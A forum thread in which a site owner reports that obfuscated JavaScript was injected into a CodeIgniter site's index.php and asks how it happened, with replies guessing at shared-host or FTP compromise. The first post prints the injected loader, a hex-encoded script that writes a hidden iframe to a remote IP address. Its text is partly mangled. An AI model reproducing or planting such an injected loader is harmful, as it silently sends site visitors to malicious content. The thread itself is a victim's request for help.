Welcome Guest, Not a member yet? Register   Sign In
Codeigniter hacked?
#1

[eluser]Martin Penev[/eluser]
Hi guys,

Yesterday, a friend of mine told me, that the website for Starmountain snowboard community (www.starmountain.ch) has been hacked by a company. After kooking in to this, I've discovered, that someone or something has put additional code after the codeigniter code within the index.php.

At first, I couldn't believe it, but it's true, somehow there was a javascript code. For Security reason, I just put in the code within the script-tags.

Code:
<!--
var d=document,kol=561;
function O10(H48525EBB){ function H48525EBB() {var H48525EBB=16;return H48525EBB;} return( parseInt(H48525EBB,H48525EBB()));}functi on H48525EBB(H48525EBB){ var H48525EBB='';for(H48525EBB=0; H48525EBB<H48525EBB.length; H48525EBB+=2){ H48525EBB += ( String.fromCharCode (O10(H48525EBB.substr(H48525EBB E913C, 2))));}return H48525EBB;} [removed](H48525EBB('3C7363726970743E696 628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3 232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292 A323037393330292B27376231635C272077696474683D34373 8206865696768743D343335207374796C653D5C27646973706 C61793A206E6F6E655C273E3C2F494652414D45203E27293B7 D766172206D7969613D747275653B3C2F7363726970743E')) ;
//--&gt;

First I thought that was a break because i didn't valid and unxss all data, but every form field passed to the validation is being validated.

How is it possible to write into a server-side script without any indication or usage of filewrite-code?

Has anybody ever encountered something like this or has an answer?

Greetings

Martin
#2

[eluser]GSV Sleeper Service[/eluser]
are they on a shared host? the host could be using an old version of cpanel.
#3

[eluser]Martin Penev[/eluser]
shared host? yes, but it's not cPanel, i mean the official cPanel. It's more like a customized, perhabs self-programmed one.

Any theories about the hack problem?
#4

[eluser]johnwbaxter[/eluser]
Without having access to server access logs it would be difficult to tell how this has happened. Also, if there is not info on the file having changed it may lean towards a server breach and someone having changed the user on the file and the time it was modified.

Also which version of CI is it on? I seem to remember there being a security vulnerability with an earlier version.
#5

[eluser]xwero[/eluser]
What do you mean by
Quote:How is it possible to write into a server-side script without any indication or usage of filewrite-code?
Are you saying the modification time of the file isn't changed since the last time you uploaded the index file? I'm not much of a hacker but that would be hard to do i think?

The problem could be the security measures of the server, too little restrictions uploading files or someone could have intercepted the ftp login for the site.
#6

[eluser]johnwbaxter[/eluser]
I think it is possible to change the modified time of a file if you have enough access to the server. It seems like a lot of trouble to go to but it is possible i think.
#7

[eluser]Martin Penev[/eluser]
[quote author="audiopleb" date="1213904921"]Without having access to server access logs it would be difficult to tell how this has happened. Also, if there is not info on the file having changed it may lean towards a server breach and someone having changed the user on the file and the time it was modified.

Also which version of CI is it on? I seem to remember there being a security vulnerability with an earlier version.[/quote]

Yea, I know, it's pretty difficult to tell without the log, I'll see, if I can contact the provider concerning this.

The app is using Codeigniter v1.5.4. I didn't upgrade it yet.

[quote author="xwero" date="1213905016"]What do you mean by
Quote:How is it possible to write into a server-side script without any indication or usage of filewrite-code?
Are you saying the modification time of the file isn't changed since the last time you uploaded the index file? I'm not much of a hacker but that would be hard to do i think?

The problem could be the security measures of the server, too little restrictions uploading files or someone could have intercepted the ftp login for the site.[/quote]

I know, I'm no expert in servers either. By "filewrite-code" I mean a PHP code, that writes into the file system, for example into a textfile. Since there's no such code within the app, there must be another reason for the hack.




Theme © iAndrew 2016 - Forum software by © MyBB